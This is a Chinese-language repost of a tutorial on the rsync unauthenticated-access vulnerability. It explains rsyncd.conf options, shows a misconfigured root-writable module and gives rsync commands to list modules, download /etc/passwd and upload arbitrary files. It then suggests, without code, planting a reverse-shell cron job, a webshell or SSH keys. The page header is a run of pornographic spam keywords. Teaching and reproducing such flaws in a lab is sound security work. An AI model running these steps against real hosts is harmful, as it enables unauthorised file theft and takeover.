日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

rsync 未授权访问漏洞

發布時間:2023/12/18 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 rsync 未授权访问漏洞 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

rsync

rsync,remote synchronize顧名思意就知道它是一款實現遠程同步功能的軟件,它在同步文件的同時,可以保持原來文件的權限、時間、軟硬鏈接等附加信息。 rsync是用 “rsync 算法”提供了一個客戶機和遠程文件服務器的文件同步的快速方法,而且可以通過ssh方式來傳輸文件,這樣其保密性也非常好

rsync配置文件

配置文件 rsyncd.conf 由全局配置和若干模塊配置組成。一般在/etc/rsyncd.conf
配置文件的語法為:

  • 模塊以 [模塊名] 開始
    模塊定義什么呢?主要是定義服務器哪個目錄要被同步。每個模塊都要以[name]形式。這個名字就是在rsync 客戶端看到的名字,其實有點象Samba服務器提供的共享名。而服務器真正同步的數據是通過path 指定的。我們可以根據自己的需要,來指定多個模塊。每個模塊要指定認證用戶,密碼文件、但排除并不是必須的
  • 參數配置行的格式是 name = value ,其中 value 可以有兩種數據類型:
  • 字符串(可以不用引號定界字符串)
  • 布爾值(1/0 或 yes/no 或 true/false)
  • 以 # 或 ; 開始的行為注釋
  • ?\為續行符
參數說明
uid此參數指定與該模塊之間的文件傳輸的用戶名或用戶ID
gid此參數指定在訪問模塊時將使用的一個或多個組名稱/ID
use chroot若為 true,則 rsync 在傳輸文件之前首先 chroot 到 path 參數所指定的目錄下。這樣做的原因是實現額外的安全防護,但是缺點是需要 root 權限,并且不能備份指向 path 外部的符號連接所指向的目錄文件
max connections指定該模塊的最大并發連接數量以保護服務器,超過限制的連接請求將被告知隨后再試
syslog facility指定 rsync 發送日志消息給 syslog 時的消息級別
pid filersync 的守護進程將其 PID 寫入指定的文件
log file指定 rsync 守護進程的日志文件,而不將日志發送給 syslog
path指定當前模塊在 rsync 服務器上的同步路徑,該參數是必須指定的
comment給模塊指定一個描述,該描述連同模塊名在客戶連接得到模塊列表時顯示給客戶
read only指定是否允許客戶上傳文件。若為 true 則不允許上傳;若為 false 并且服務器目錄也具有讀寫權限則允許上傳
auth users指定驗證用戶名,可以不設置,不設置默認不用密碼,設置的話安全性更高點
secrets file指定密碼文件,如果設定驗證用戶,這一項必須設置,設定密碼權限為400
hosts allow設置可以允許訪問的主機,可以是網段,多個Ip地址用空格隔開

該漏洞環境下rsync的配置文件

uid = root
gid = root
use chroot = no
max connections = 4
syslog facility = local5
pid file = /var/run/rsyncd.pid
log file = /var/log/rsyncd.log

[src]
path = /
comment = src path
read only = no

由配置文件,我們可以訪問path所指定目錄以外的目錄,該配置還定義了一個src模塊,路徑指向根目錄,而且可讀可寫,最重要的是沒有設置用戶名,如此便無需密碼直接訪問

復現

  • 查看可用模塊
    rsync 192.168.122.1::
    rsync rsync://192.168.122.1:873/
    rsync rsync://192.168.122.1

  • 列出模塊下文件
    rsync 192.168.122.1::src
    rsync rsync://192.168.122.1/src

  • 下載任意文件
    rsync rsync://192.168.122.1/src/etc/passwd ./
    rsync 192.168.122.1::src/etc/passwd ./

  • 上傳任意文件
    rsync x.txt rsync://192.168.122.1/src/home/
    rsync x.txt 192.168.122.1::src/home/

然后可以寫入了一個cron任務,反彈shell,有Web服務的話,可以寫WebShell,或者寫ssh公鑰等

參考:
rsyncd.conf

轉載于:https://www.cnblogs.com/leixiao-/p/10227086.html

總結

以上是生活随笔為你收集整理的rsync 未授权访问漏洞的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。